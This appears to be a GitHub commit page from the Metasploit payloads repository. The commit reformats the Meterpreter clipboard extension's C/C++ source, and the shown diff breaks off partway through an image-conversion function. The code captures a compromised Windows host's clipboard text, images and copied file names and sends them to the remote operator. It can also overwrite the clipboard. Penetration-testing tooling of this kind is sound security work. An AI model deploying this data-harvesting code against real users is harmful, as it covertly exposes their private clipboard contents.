github/metasploit-payloads
1
Fork 0
mirror of https://github.com/rapid7/metasploit-payloads synced 2025-02-28 06:13:03 +01:00
Code Releases Activity

Adjust format to fit with default VS 2013 rules

Browse Source 
VS 2013 appears to have built-in formatting for C++, so this commit tidies
up the code a bit to fit within those rules.

It also removes a few warnings which the new compiler has shown.
This commit is contained in:
OJ 2013-10-29 20:31:28 +10:00
parent 524b61eb80
commit 1108917ae6
7 changed files with 468 additions and 484 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

323
c/meterpreter/source/extensions/extapi/clipboard.c
View File

@ -8,47 +8,47 @@
#ifdef _WIN32
/*! @brief GlobalAlloc function pointer type. */
typedef HGLOBAL (WINAPI * PGLOBALALLOC)( UINT uFlags, SIZE_T dwBytes );
typedef HGLOBAL(WINAPI * PGLOBALALLOC)(UINT uFlags, SIZE_T dwBytes);
/*! @brief GlobalFree function pointer type. */
typedef HGLOBAL (WINAPI * PGLOBALFREE)( HGLOBAL hMem );
typedef HGLOBAL(WINAPI * PGLOBALFREE)(HGLOBAL hMem);
/*! @brief GlobalLock function pointer type. */
typedef LPVOID (WINAPI * PGLOBALLOCK)( HGLOBAL hMem );
typedef LPVOID(WINAPI * PGLOBALLOCK)(HGLOBAL hMem);
/*! @brief GlobalUnlock function pointer type. */
typedef LPVOID (WINAPI * PGLOBALUNLOCK)( HGLOBAL hMem );
typedef LPVOID(WINAPI * PGLOBALUNLOCK)(HGLOBAL hMem);
/*! @brief OpenClipboard function pointer type. */
typedef BOOL (WINAPI * POPENCLIPBOARD)( HWND hWndNewOwner );
typedef BOOL(WINAPI * POPENCLIPBOARD)(HWND hWndNewOwner);
/*! @brief CloseClipboard function pointer type. */
typedef BOOL (WINAPI * PCLOSECLIPBOARD)();
typedef BOOL(WINAPI * PCLOSECLIPBOARD)();
/*! @brief SetClipboardData function pointer type. */
typedef HANDLE (WINAPI * PSETCLIPBOARDDATA)( UINT uFormat, HANDLE hMem );
typedef HANDLE(WINAPI * PSETCLIPBOARDDATA)(UINT uFormat, HANDLE hMem);
/*! @brief SetClipboardData function pointer type. */
typedef HANDLE (WINAPI * PGETCLIPBOARDDATA)( UINT uFormat );
typedef HANDLE(WINAPI * PGETCLIPBOARDDATA)(UINT uFormat);
/*! @brief EnumClipboardFormats function pointer type. */
typedef UINT (WINAPI * PENUMCLIPBOARDFORMATS)( UINT uFormat );
typedef UINT(WINAPI * PENUMCLIPBOARDFORMATS)(UINT uFormat);
/*! @brief EmptyClipboard function pointer type. */
typedef BOOL (WINAPI * PEMPTYCLIPBOARD)();
typedef BOOL(WINAPI * PEMPTYCLIPBOARD)();
/*! @brief DragQueryFileA function pointer type. */
typedef BOOL (WINAPI * PDRAGQUERYFILEA)( HDROP hDrop, UINT iFile, LPSTR lpszFile, UINT cch );
typedef BOOL(WINAPI * PDRAGQUERYFILEA)(HDROP hDrop, UINT iFile, LPSTR lpszFile, UINT cch);
/*! @brief CreateFileA function pointer type. */
typedef HANDLE (WINAPI * PCREATEFILEA)( LPCSTR lpFileName, DWORD dwDesiredAccess, DWORD dwShareMode, LPSECURITY_ATTRIBUTES lpSecurityAttributes,
DWORD dwCreationDisposition, DWORD dwFlagsAndAttributes, HANDLE hTemplateFile );
typedef HANDLE(WINAPI * PCREATEFILEA)(LPCSTR lpFileName, DWORD dwDesiredAccess, DWORD dwShareMode, LPSECURITY_ATTRIBUTES lpSecurityAttributes,
DWORD dwCreationDisposition, DWORD dwFlagsAndAttributes, HANDLE hTemplateFile);
/*! @brief CloseHandle function pointer type. */
typedef BOOL (WINAPI * PCLOSEHANDLE)( HANDLE hObject );
typedef BOOL(WINAPI * PCLOSEHANDLE)(HANDLE hObject);
/*! @brief GetFileSizeEx function pointer type. */
typedef BOOL (WINAPI * PGETFILESIZEEX)( HANDLE hFile, PLARGE_INTEGER lpFileSize );
typedef BOOL(WINAPI * PGETFILESIZEEX)(HANDLE hFile, PLARGE_INTEGER lpFileSize);
#endif
@ -65,7 +65,7 @@ typedef BOOL (WINAPI * PGETFILESIZEEX)( HANDLE hFile, PLARGE_INTEGER lpFileSize
* @return Indication of success or failure.
* @todo Add support for more data formats.
*/
DWORD request_clipboard_get_data( Remote *remote, Packet *packet )
DWORD request_clipboard_get_data(Remote *remote, Packet *packet)
{
#ifdef _WIN32
DWORD dwResult;
@ -93,155 +93,155 @@ DWORD request_clipboard_get_data( Remote *remote, Packet *packet )
UINT uFileIndex = 0;
UINT uFileCount = 0;
CHAR lpFileName[MAX_PATH];
Tlv entries[2] = {0};
LARGE_INTEGER largeInt = {0};
Tlv entries[2] = { 0 };
LARGE_INTEGER largeInt = { 0 };
LPBITMAPINFO lpBI = NULL;
ConvertedImage image;
Packet *pResponse = packet_create_response( packet );
Packet *pResponse = packet_create_response(packet);
do
{
dprintf( "Loading user32.dll" );
if( (hUser32 = LoadLibraryA( "user32.dll" )) == NULL)
BREAK_ON_ERROR( "Unable to load user32.dll" );
dprintf("Loading user32.dll");
if ((hUser32 = LoadLibraryA("user32.dll")) == NULL)
BREAK_ON_ERROR("Unable to load user32.dll");
dprintf( "Loading kernel32.dll" );
if( (hKernel32 = LoadLibraryA( "kernel32.dll" )) == NULL)
BREAK_ON_ERROR( "Unable to load kernel32.dll" );
dprintf("Loading kernel32.dll");
if ((hKernel32 = LoadLibraryA("kernel32.dll")) == NULL)
BREAK_ON_ERROR("Unable to load kernel32.dll");
dprintf( "Searching for GlobalLock" );
if( (pGlobalLock = (PGLOBALLOCK)GetProcAddress( hKernel32, "GlobalLock" )) == NULL )
BREAK_ON_ERROR( "Unable to locate GlobalLock in kernel32.dll" );
dprintf("Searching for GlobalLock");
if ((pGlobalLock = (PGLOBALLOCK)GetProcAddress(hKernel32, "GlobalLock")) == NULL)
BREAK_ON_ERROR("Unable to locate GlobalLock in kernel32.dll");
dprintf( "Searching for GlobalUnlock" );
if( (pGlobalUnlock = (PGLOBALUNLOCK)GetProcAddress( hKernel32, "GlobalUnlock" )) == NULL )
BREAK_ON_ERROR( "Unable to locate GlobalUnlock in kernel32.dll" );
dprintf("Searching for GlobalUnlock");
if ((pGlobalUnlock = (PGLOBALUNLOCK)GetProcAddress(hKernel32, "GlobalUnlock")) == NULL)
BREAK_ON_ERROR("Unable to locate GlobalUnlock in kernel32.dll");
dprintf( "Searching for OpenClipboard" );
if( (pOpenClipboard = (POPENCLIPBOARD)GetProcAddress( hUser32, "OpenClipboard" )) == NULL )
BREAK_ON_ERROR( "Unable to locate OpenClipboard in user32.dll" );
dprintf("Searching for OpenClipboard");
if ((pOpenClipboard = (POPENCLIPBOARD)GetProcAddress(hUser32, "OpenClipboard")) == NULL)
BREAK_ON_ERROR("Unable to locate OpenClipboard in user32.dll");
dprintf( "Searching for CloseClipboard" );
if( (pCloseClipboard = (PCLOSECLIPBOARD)GetProcAddress( hUser32, "CloseClipboard" )) == NULL )
BREAK_ON_ERROR( "Unable to locate CloseClipboard in user32.dll" );
dprintf("Searching for CloseClipboard");
if ((pCloseClipboard = (PCLOSECLIPBOARD)GetProcAddress(hUser32, "CloseClipboard")) == NULL)
BREAK_ON_ERROR("Unable to locate CloseClipboard in user32.dll");
dprintf( "Searching for GetClipboardData" );
if( (pGetClipboardData = (PGETCLIPBOARDDATA)GetProcAddress( hUser32, "GetClipboardData" )) == NULL )
BREAK_ON_ERROR( "Unable to locate GetClipboardData in user32.dll" );
dprintf("Searching for GetClipboardData");
if ((pGetClipboardData = (PGETCLIPBOARDDATA)GetProcAddress(hUser32, "GetClipboardData")) == NULL)
BREAK_ON_ERROR("Unable to locate GetClipboardData in user32.dll");
dprintf( "Searching for EnumClipboardFormats" );
if( (pEnumClipboardFormats = (PENUMCLIPBOARDFORMATS)GetProcAddress( hUser32, "EnumClipboardFormats" )) == NULL )
BREAK_ON_ERROR( "Unable to locate EnumClipboardFormats in user32.dll" );
dprintf("Searching for EnumClipboardFormats");
if ((pEnumClipboardFormats = (PENUMCLIPBOARDFORMATS)GetProcAddress(hUser32, "EnumClipboardFormats")) == NULL)
BREAK_ON_ERROR("Unable to locate EnumClipboardFormats in user32.dll");
// Try to get a lock on the clipboard
if( !pOpenClipboard( NULL ) ) {
if (!pOpenClipboard(NULL)) {
dwResult = GetLastError();
BREAK_WITH_ERROR( "Unable to open the clipboard", dwResult );
BREAK_WITH_ERROR("Unable to open the clipboard", dwResult);
}
dprintf( "Clipboard locked, attempting to get data..." );
dprintf("Clipboard locked, attempting to get data...");
while ( uFormat = pEnumClipboardFormats( uFormat ) )
while (uFormat = pEnumClipboardFormats(uFormat))
{
if( uFormat == CF_TEXT ) {
if (uFormat == CF_TEXT) {
// there's raw text on the clipboard
if ( (hClipboardData = pGetClipboardData( CF_TEXT ) ) != NULL
&& (lpClipString = (PCHAR)pGlobalLock( hClipboardData )) != NULL ) {
if ((hClipboardData = pGetClipboardData(CF_TEXT)) != NULL
&& (lpClipString = (PCHAR)pGlobalLock(hClipboardData)) != NULL) {
dprintf( "Clipboard text captured: %s", lpClipString );
packet_add_tlv_string( pResponse, TLV_TYPE_EXT_CLIPBOARD_TYPE_TEXT, lpClipString );
dprintf("Clipboard text captured: %s", lpClipString);
packet_add_tlv_string(pResponse, TLV_TYPE_EXT_CLIPBOARD_TYPE_TEXT, lpClipString);
pGlobalUnlock( hClipboardData );
pGlobalUnlock(hClipboardData);
}
}
else if( uFormat == CF_DIB ) {
else if (uFormat == CF_DIB) {
// an image of some kind is on the clipboard
dprintf( "Grabbing the clipboard bitmap data" );
if ( (hClipboardData = pGetClipboardData( CF_DIB ) ) != NULL
&& (lpBI = (LPBITMAPINFO)pGlobalLock( hClipboardData )) != NULL ) {
dprintf("Grabbing the clipboard bitmap data");
if ((hClipboardData = pGetClipboardData(CF_DIB)) != NULL
&& (lpBI = (LPBITMAPINFO)pGlobalLock(hClipboardData)) != NULL) {
if( convert_to_jpg( lpBI, (LPVOID)(lpBI + 1), 80, &image ) == ERROR_SUCCESS ) {
if (convert_to_jpg(lpBI, (LPVOID)(lpBI + 1), 80, &image) == ERROR_SUCCESS) {
dprintf( "Clipboard bitmap captured to image: %p, Size: %u bytes", image.pImageBuffer, image.dwImageBufferSize );
packet_add_tlv_raw( pResponse, TLV_TYPE_EXT_CLIPBOARD_TYPE_JPG, image.pImageBuffer, image.dwImageBufferSize );
dprintf("Clipboard bitmap captured to image: %p, Size: %u bytes", image.pImageBuffer, image.dwImageBufferSize);
packet_add_tlv_raw(pResponse, TLV_TYPE_EXT_CLIPBOARD_TYPE_JPG, image.pImageBuffer, image.dwImageBufferSize);
// Just leaving this in for debugging purposes later on
//hSourceFile = CreateFileA("C:\\temp\\foo.jpg", GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);
//WriteFile(hSourceFile, image.pImageBuffer, image.dwImageBufferSize, &largeInt.LowPart, NULL);
//CloseHandle(hSourceFile);
free( image.pImageBuffer );
free(image.pImageBuffer);
}
pGlobalUnlock( hClipboardData );
pGlobalUnlock(hClipboardData);
}
}
else if( uFormat == CF_HDROP ) {
else if (uFormat == CF_HDROP) {
// there's one or more files on the clipboard
dprintf( "Files have been located on the clipboard" );
dprintf("Files have been located on the clipboard");
do
{
dprintf( "Loading shell32.dll" );
if( (hShell32 = LoadLibraryA( "shell32.dll" )) == NULL)
BREAK_ON_ERROR( "Unable to load shell32.dll" );
dprintf("Loading shell32.dll");
if ((hShell32 = LoadLibraryA("shell32.dll")) == NULL)
BREAK_ON_ERROR("Unable to load shell32.dll");
dprintf( "Searching for CreateFileA" );
if( (pCreateFileA = (PCREATEFILEA)GetProcAddress( hKernel32, "CreateFileA" )) == NULL )
BREAK_ON_ERROR( "Unable to locate CreateFileA in kernel32.dll" );
dprintf("Searching for CreateFileA");
if ((pCreateFileA = (PCREATEFILEA)GetProcAddress(hKernel32, "CreateFileA")) == NULL)
BREAK_ON_ERROR("Unable to locate CreateFileA in kernel32.dll");
dprintf( "Searching for CloseHandle" );
if( (pCloseHandle = (PCLOSEHANDLE)GetProcAddress( hKernel32, "CloseHandle" )) == NULL )
BREAK_ON_ERROR( "Unable to locate CloseHandle in kernel32.dll" );
dprintf("Searching for CloseHandle");
if ((pCloseHandle = (PCLOSEHANDLE)GetProcAddress(hKernel32, "CloseHandle")) == NULL)
BREAK_ON_ERROR("Unable to locate CloseHandle in kernel32.dll");
dprintf( "Searching for GetFileSizeEx" );
if( (pGetFileSizeEx = (PGETFILESIZEEX)GetProcAddress( hKernel32, "GetFileSizeEx" )) == NULL )
BREAK_ON_ERROR( "Unable to locate GetFileSizeEx in kernel32.dll" );
dprintf("Searching for GetFileSizeEx");
if ((pGetFileSizeEx = (PGETFILESIZEEX)GetProcAddress(hKernel32, "GetFileSizeEx")) == NULL)
BREAK_ON_ERROR("Unable to locate GetFileSizeEx in kernel32.dll");
dprintf( "Searching for DragQueryFileA" );
if( (pDragQueryFileA = (PDRAGQUERYFILEA)GetProcAddress( hShell32, "DragQueryFileA" )) == NULL )
BREAK_ON_ERROR( "Unable to locate CloseClipboard in shell32.dll" );
dprintf("Searching for DragQueryFileA");
if ((pDragQueryFileA = (PDRAGQUERYFILEA)GetProcAddress(hShell32, "DragQueryFileA")) == NULL)
BREAK_ON_ERROR("Unable to locate CloseClipboard in shell32.dll");
dprintf( "Grabbing the clipboard file drop data" );
if ( (hClipboardData = pGetClipboardData( CF_HDROP ) ) != NULL
&& (hFileDrop = (HDROP)pGlobalLock( hClipboardData )) != NULL ) {
dprintf("Grabbing the clipboard file drop data");
if ((hClipboardData = pGetClipboardData(CF_HDROP)) != NULL
&& (hFileDrop = (HDROP)pGlobalLock(hClipboardData)) != NULL) {
uFileCount = pDragQueryFileA( hFileDrop, (UINT)-1, NULL, 0 );
uFileCount = pDragQueryFileA(hFileDrop, (UINT)-1, NULL, 0);
dprintf( "Parsing %u file(s) on the clipboard.", uFileCount );
dprintf("Parsing %u file(s) on the clipboard.", uFileCount);
for( uFileIndex = 0; uFileIndex < uFileCount; ++uFileIndex ) {
if( pDragQueryFileA( hFileDrop, uFileIndex, lpFileName, sizeof( lpFileName ) ) ) {
dprintf( "Clipboard file entry: %s", lpFileName );
for (uFileIndex = 0; uFileIndex < uFileCount; ++uFileIndex) {
if (pDragQueryFileA(hFileDrop, uFileIndex, lpFileName, sizeof(lpFileName))) {
dprintf("Clipboard file entry: %s", lpFileName);
memset( &entries, 0, sizeof(entries) );
memset( &largeInt, 0, sizeof(largeInt) );
memset(&entries, 0, sizeof(entries));
memset(&largeInt, 0, sizeof(largeInt));
entries[0].header.type = TLV_TYPE_EXT_CLIPBOARD_TYPE_FILE_NAME;
entries[0].header.length = (DWORD)strlen( lpFileName ) + 1;
entries[0].buffer = (PUCHAR)lpFileName;
entries[0].header.type = TLV_TYPE_EXT_CLIPBOARD_TYPE_FILE_NAME;
entries[0].header.length = (DWORD)strlen(lpFileName) + 1;
entries[0].buffer = (PUCHAR)lpFileName;
entries[1].header.type = TLV_TYPE_EXT_CLIPBOARD_TYPE_FILE_SIZE;
entries[1].header.type = TLV_TYPE_EXT_CLIPBOARD_TYPE_FILE_SIZE;
entries[1].header.length = sizeof(QWORD);
entries[1].buffer = (PUCHAR)&largeInt.QuadPart;
entries[1].buffer = (PUCHAR)&largeInt.QuadPart;
if( (hSourceFile = pCreateFileA( lpFileName, GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL )) != NULL ) {
if( pGetFileSizeEx( hSourceFile, &largeInt ) ) {
largeInt.QuadPart = htonq( largeInt.QuadPart );
if ((hSourceFile = pCreateFileA(lpFileName, GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL)) != NULL) {
if (pGetFileSizeEx(hSourceFile, &largeInt)) {
largeInt.QuadPart = htonq(largeInt.QuadPart);
}
pCloseHandle( hSourceFile );
pCloseHandle(hSourceFile);
}
packet_add_tlv_group( pResponse, TLV_TYPE_EXT_CLIPBOARD_TYPE_FILE, entries, 2 );
packet_add_tlv_group(pResponse, TLV_TYPE_EXT_CLIPBOARD_TYPE_FILE, entries, 2);
}
}
pGlobalUnlock( hClipboardData );
pGlobalUnlock(hClipboardData);
}
} while(0);
} while (0);
}
}
@ -249,19 +249,19 @@ DWORD request_clipboard_get_data( Remote *remote, Packet *packet )
pCloseClipboard();
} while(0);
} while (0);
if( hShell32 )
FreeLibrary( hShell32 );
if (hShell32)
FreeLibrary(hShell32);
if( hKernel32 )
FreeLibrary( hKernel32 );
if (hKernel32)
FreeLibrary(hKernel32);
if( hUser32 )
FreeLibrary( hUser32 );
if (hUser32)
FreeLibrary(hUser32);
if( pResponse )
packet_transmit_response( dwResult, remote, pResponse );
if (pResponse)
packet_transmit_response(dwResult, remote, pResponse);
return dwResult;
#else
@ -280,7 +280,7 @@ DWORD request_clipboard_get_data( Remote *remote, Packet *packet )
* @return Indication of success or failure.
* @todo Add support for more data formats.
*/
DWORD request_clipboard_set_data( Remote *remote, Packet *packet )
DWORD request_clipboard_set_data(Remote *remote, Packet *packet)
{
#ifdef _WIN32
DWORD dwResult;
@ -304,97 +304,98 @@ DWORD request_clipboard_set_data( Remote *remote, Packet *packet )
do
{
if( (lpClipString = packet_get_tlv_value_string( packet, TLV_TYPE_EXT_CLIPBOARD_TYPE_TEXT )) == NULL )
BREAK_WITH_ERROR( "No string data specified", ERROR_INVALID_PARAMETER );
if ((lpClipString = packet_get_tlv_value_string(packet, TLV_TYPE_EXT_CLIPBOARD_TYPE_TEXT)) == NULL)
BREAK_WITH_ERROR("No string data specified", ERROR_INVALID_PARAMETER);
dprintf( "Loading user32.dll" );
if( (hUser32 = LoadLibraryA( "user32.dll" )) == NULL)
BREAK_ON_ERROR( "Unable to load user32.dll" );
dprintf("Loading user32.dll");
if ((hUser32 = LoadLibraryA("user32.dll")) == NULL)
BREAK_ON_ERROR("Unable to load user32.dll");
dprintf( "Loading kernel32.dll" );
if( (hKernel32 = LoadLibraryA( "kernel32.dll" )) == NULL)
BREAK_ON_ERROR( "Unable to load kernel32.dll" );
dprintf("Loading kernel32.dll");
if ((hKernel32 = LoadLibraryA("kernel32.dll")) == NULL)
BREAK_ON_ERROR("Unable to load kernel32.dll");
dprintf( "Searching for GlobalAlloc" );
if( (pGlobalAlloc = (PGLOBALALLOC)GetProcAddress( hKernel32, "GlobalAlloc" )) == NULL )
BREAK_ON_ERROR( "Unable to locate GlobalAlloc in kernel32.dll" );
dprintf("Searching for GlobalAlloc");
if ((pGlobalAlloc = (PGLOBALALLOC)GetProcAddress(hKernel32, "GlobalAlloc")) == NULL)
BREAK_ON_ERROR("Unable to locate GlobalAlloc in kernel32.dll");
dprintf( "Searching for GlobalLock" );
if( (pGlobalLock = (PGLOBALLOCK)GetProcAddress( hKernel32, "GlobalLock" )) == NULL )
BREAK_ON_ERROR( "Unable to locate GlobalLock in kernel32.dll" );
dprintf("Searching for GlobalLock");
if ((pGlobalLock = (PGLOBALLOCK)GetProcAddress(hKernel32, "GlobalLock")) == NULL)
BREAK_ON_ERROR("Unable to locate GlobalLock in kernel32.dll");
dprintf( "Searching for GlobalUnlock" );
if( (pGlobalUnlock = (PGLOBALUNLOCK)GetProcAddress( hKernel32, "GlobalUnlock" )) == NULL )
BREAK_ON_ERROR( "Unable to locate GlobalUnlock in kernel32.dll" );
dprintf("Searching for GlobalUnlock");
if ((pGlobalUnlock = (PGLOBALUNLOCK)GetProcAddress(hKernel32, "GlobalUnlock")) == NULL)
BREAK_ON_ERROR("Unable to locate GlobalUnlock in kernel32.dll");
dprintf( "Searching for OpenClipboard" );
if( (pOpenClipboard = (POPENCLIPBOARD)GetProcAddress( hUser32, "OpenClipboard" )) == NULL )
BREAK_ON_ERROR( "Unable to locate OpenClipboard in user32.dll" );
dprintf("Searching for OpenClipboard");
if ((pOpenClipboard = (POPENCLIPBOARD)GetProcAddress(hUser32, "OpenClipboard")) == NULL)
BREAK_ON_ERROR("Unable to locate OpenClipboard in user32.dll");
dprintf( "Searching for CloseClipboard" );
if( (pCloseClipboard = (PCLOSECLIPBOARD)GetProcAddress( hUser32, "CloseClipboard" )) == NULL )
BREAK_ON_ERROR( "Unable to locate CloseClipboard in user32.dll" );
dprintf("Searching for CloseClipboard");
if ((pCloseClipboard = (PCLOSECLIPBOARD)GetProcAddress(hUser32, "CloseClipboard")) == NULL)
BREAK_ON_ERROR("Unable to locate CloseClipboard in user32.dll");
dprintf( "Searching for EmptyClipboard" );
if( (pEmptyClipboard = (PEMPTYCLIPBOARD)GetProcAddress( hUser32, "EmptyClipboard" )) == NULL )
BREAK_ON_ERROR( "Unable to locate EmptyClipboard in user32.dll" );
dprintf("Searching for EmptyClipboard");
if ((pEmptyClipboard = (PEMPTYCLIPBOARD)GetProcAddress(hUser32, "EmptyClipboard")) == NULL)
BREAK_ON_ERROR("Unable to locate EmptyClipboard in user32.dll");
dprintf( "Searching for SetClipboardData" );
if( (pSetClipboardData = (PSETCLIPBOARDDATA)GetProcAddress( hUser32, "SetClipboardData" )) == NULL )
BREAK_ON_ERROR( "Unable to locate SetClipboardData in user32.dll" );
dprintf("Searching for SetClipboardData");
if ((pSetClipboardData = (PSETCLIPBOARDDATA)GetProcAddress(hUser32, "SetClipboardData")) == NULL)
BREAK_ON_ERROR("Unable to locate SetClipboardData in user32.dll");
cbStringBytes = (SIZE_T)strlen( lpClipString ) + 1;
cbStringBytes = (SIZE_T)strlen(lpClipString) + 1;
// do the "use the right kind of memory once locked" clip board data dance.
// Note that we don't free up the memory we've allocated with GlobalAlloc
// because the windows clipboard magic does it for us.
if( (hClipboardData = pGlobalAlloc( GMEM_MOVEABLE | GMEM_DDESHARE, cbStringBytes )) == NULL ) {
if ((hClipboardData = pGlobalAlloc(GMEM_MOVEABLE | GMEM_DDESHARE, cbStringBytes)) == NULL) {
dwResult = GetLastError();
pCloseClipboard();
BREAK_WITH_ERROR( "Failed to allocate clipboard memory", dwResult );
BREAK_WITH_ERROR("Failed to allocate clipboard memory", dwResult);
}
lpLockedData = (PCHAR)pGlobalLock( hClipboardData );
lpLockedData = (PCHAR)pGlobalLock(hClipboardData);
memcpy_s( lpLockedData, cbStringBytes, lpClipString, cbStringBytes );
memcpy_s(lpLockedData, cbStringBytes, lpClipString, cbStringBytes);
pGlobalUnlock( hClipboardData );
pGlobalUnlock(hClipboardData);
// Try to get a lock on the clipboard
if( !pOpenClipboard( NULL ) ) {
if (!pOpenClipboard(NULL)) {
dwResult = GetLastError();
BREAK_WITH_ERROR( "Unable to open the clipboard", dwResult );
BREAK_WITH_ERROR("Unable to open the clipboard", dwResult);
}
// Clear the clipboard data
pEmptyClipboard();
if( !pSetClipboardData( CF_TEXT, hClipboardData ) ) {
if (!pSetClipboardData(CF_TEXT, hClipboardData)) {
dwResult = GetLastError();
dprintf( "Failed to set the clipboad data: %u", dwResult );
} else {
dprintf("Failed to set the clipboad data: %u", dwResult);
}
else {
dwResult = ERROR_SUCCESS;
}
pCloseClipboard();
} while(0);
} while (0);
// If something went wrong and we have clipboard data, then we need to
// free it up because the clipboard can't do it for us.
if( dwResult != ERROR_SUCCESS && hClipboardData != NULL ) {
dprintf( "Searching for GlobalFree" );
if( (pGlobalFree = (PGLOBALFREE)GetProcAddress( hKernel32, "GlobalFree" )) != NULL )
pGlobalFree( hClipboardData );
if (dwResult != ERROR_SUCCESS && hClipboardData != NULL) {
dprintf("Searching for GlobalFree");
if ((pGlobalFree = (PGLOBALFREE)GetProcAddress(hKernel32, "GlobalFree")) != NULL)
pGlobalFree(hClipboardData);
}
if( hKernel32 )
FreeLibrary( hKernel32 );
if (hKernel32)
FreeLibrary(hKernel32);
if( hUser32 )
FreeLibrary( hUser32 );
if (hUser32)
FreeLibrary(hUser32);
packet_transmit_empty_response( remote, packet, dwResult );
packet_transmit_empty_response(remote, packet, dwResult);
return dwResult;
#else

4
c/meterpreter/source/extensions/extapi/clipboard.h
View File

@ -5,7 +5,7 @@
#ifndef _METERPRETER_SOURCE_EXTENSION_EXTAPI_CLIPBOARD_H
#define _METERPRETER_SOURCE_EXTENSION_EXTAPI_CLIPBOARD_H
DWORD request_clipboard_set_data( Remote *remote, Packet *packet );
DWORD request_clipboard_get_data( Remote *remote, Packet *packet );
DWORD request_clipboard_set_data(Remote *remote, Packet *packet);
DWORD request_clipboard_get_data(Remote *remote, Packet *packet);
#endif

101
c/meterpreter/source/extensions/extapi/clipboard_image.cpp
View File

@ -18,44 +18,46 @@ extern "C" {
* @param pClsId Pointer to the \c CLSID structure that will receive the Class ID.
* @returns Indication of success or failure.
* @retval ERROR_SUCCESS The Class ID was extracted successfully.
* @retval ERROR_NOT_FOUND The Class ID was not found.
* @retval Otherwise The relevant error code.
*/
DWORD get_encoder_clsid( WCHAR *mimeType, CLSID * pClsId )
DWORD get_encoder_clsid(WCHAR *mimeType, CLSID * pClsId)
{
using namespace Gdiplus;
DWORD dwResult = ERROR_SUCCESS;
DWORD dwResult = ERROR_NOT_FOUND;
ImageCodecInfo* pImageCodecInfo = NULL;
do
{
UINT numEncoders;
UINT size;
if( GetImageEncodersSize( &numEncoders, &size ) != Ok )
BREAK_WITH_ERROR( "Unable to get encoders array size.", ERROR_FUNCTION_FAILED );
if (GetImageEncodersSize(&numEncoders, &size) != Ok)
BREAK_WITH_ERROR("Unable to get encoders array size.", ERROR_FUNCTION_FAILED);
if( size == 0 )
BREAK_WITH_ERROR( "No encoders found.", ERROR_FUNCTION_FAILED );
if (size == 0)
BREAK_WITH_ERROR("No encoders found.", ERROR_FUNCTION_FAILED);
if( (pImageCodecInfo = (ImageCodecInfo*)malloc( size )) == NULL )
BREAK_WITH_ERROR( "Couldn't allocate memory for ImageCodeInfo", ERROR_OUTOFMEMORY );
if ((pImageCodecInfo = (ImageCodecInfo*)malloc(size)) == NULL)
BREAK_WITH_ERROR("Couldn't allocate memory for ImageCodeInfo", ERROR_OUTOFMEMORY);
if( GetImageEncoders( numEncoders, size, pImageCodecInfo ) != Ok )
BREAK_WITH_ERROR( "Unable to get encoders.", ERROR_FUNCTION_FAILED );
if (GetImageEncoders(numEncoders, size, pImageCodecInfo) != Ok)
BREAK_WITH_ERROR("Unable to get encoders.", ERROR_FUNCTION_FAILED);
for( UINT i = 0; i < numEncoders; ++i ) {
if( wcscmp( pImageCodecInfo[i].MimeType, mimeType ) == 0 ) {
for (UINT i = 0; i < numEncoders; ++i) {
if (wcscmp(pImageCodecInfo[i].MimeType, mimeType) == 0) {
// Image encoder for the MIME type found, so copy the Class ID...
memcpy_s( pClsId, sizeof( CLSID ), &pImageCodecInfo[i].Clsid, sizeof( CLSID ) );
memcpy_s(pClsId, sizeof(CLSID), &pImageCodecInfo[i].Clsid, sizeof(CLSID));
// .. and finish up.
dwResult = ERROR_SUCCESS;
break;
}
}
} while(0);
} while (0);
if( pImageCodecInfo != NULL )
free( pImageCodecInfo );
if (pImageCodecInfo != NULL)
free(pImageCodecInfo);
return dwResult;
}
@ -72,7 +74,7 @@ extern "C" {
* @retval ERROR_SUCCESS The Class ID was extracted successfully.
* @retval Otherwise The relevant error code.
*/
DWORD convert_to_jpg( const LPBITMAPINFO lpBI, const LPVOID lpDIB, ULONG ulQuality, ConvertedImage* pImage )
DWORD convert_to_jpg(const LPBITMAPINFO lpBI, const LPVOID lpDIB, ULONG ulQuality, ConvertedImage* pImage)
{
using namespace Gdiplus;
@ -89,72 +91,71 @@ DWORD convert_to_jpg( const LPBITMAPINFO lpBI, const LPVOID lpDIB, ULONG ulQuali
do
{
if( GdiplusStartup( &gdiPlusToken, &gdiStartupInput, NULL ) != Ok )
BREAK_WITH_ERROR( "Unable to initialize GdiPlus", ERROR_FUNCTION_FAILED );
if (GdiplusStartup(&gdiPlusToken, &gdiStartupInput, NULL) != Ok)
BREAK_WITH_ERROR("Unable to initialize GdiPlus", ERROR_FUNCTION_FAILED);
CLSID jpegClsid;
dprintf( "Attempting to get the jpg class id" );
if( get_encoder_clsid( L"image/jpeg", &jpegClsid ) != ERROR_SUCCESS )
BREAK_WITH_ERROR( "Unable to find an appropriate image encoder", ERROR_FUNCTION_FAILED );
dprintf("Attempting to get the jpg class id");
if (get_encoder_clsid(L"image/jpeg", &jpegClsid) != ERROR_SUCCESS)
BREAK_WITH_ERROR("Unable to find an appropriate image encoder", ERROR_FUNCTION_FAILED);
if( (pBitmap = new Bitmap( lpBI, lpDIB ) ) == NULL )
BREAK_WITH_ERROR( "Failed to create bitmap instance", ERROR_FUNCTION_FAILED );
if ((pBitmap = new Bitmap(lpBI, lpDIB)) == NULL)
BREAK_WITH_ERROR("Failed to create bitmap instance", ERROR_FUNCTION_FAILED);
EncoderParameters encParams;
encParams.Count = 1;
encParams.Parameter[0].NumberOfValues = 1;
encParams.Parameter[0].Guid = EncoderQuality;
encParams.Parameter[0].Type = EncoderParameterValueTypeLong;
encParams.Parameter[0].Value = &ulQuality;
encParams.Parameter[0].Guid = EncoderQuality;
encParams.Parameter[0].Type = EncoderParameterValueTypeLong;
encParams.Parameter[0].Value = &ulQuality;
if( CreateStreamOnHGlobal( NULL, TRUE, &pStream ) != S_OK )
BREAK_WITH_ERROR( "Failed to create stream", ERROR_FUNCTION_FAILED );
if (CreateStreamOnHGlobal(NULL, TRUE, &pStream) != S_OK)
BREAK_WITH_ERROR("Failed to create stream", ERROR_FUNCTION_FAILED);
if( pBitmap->Save( pStream, &jpegClsid, &encParams ) != Ok )
BREAK_WITH_ERROR( "Failed to save image to stream", ERROR_FUNCTION_FAILED );
if (pBitmap->Save(pStream, &jpegClsid, &encParams) != Ok)
BREAK_WITH_ERROR("Failed to save image to stream", ERROR_FUNCTION_FAILED);
STATSTG stat;
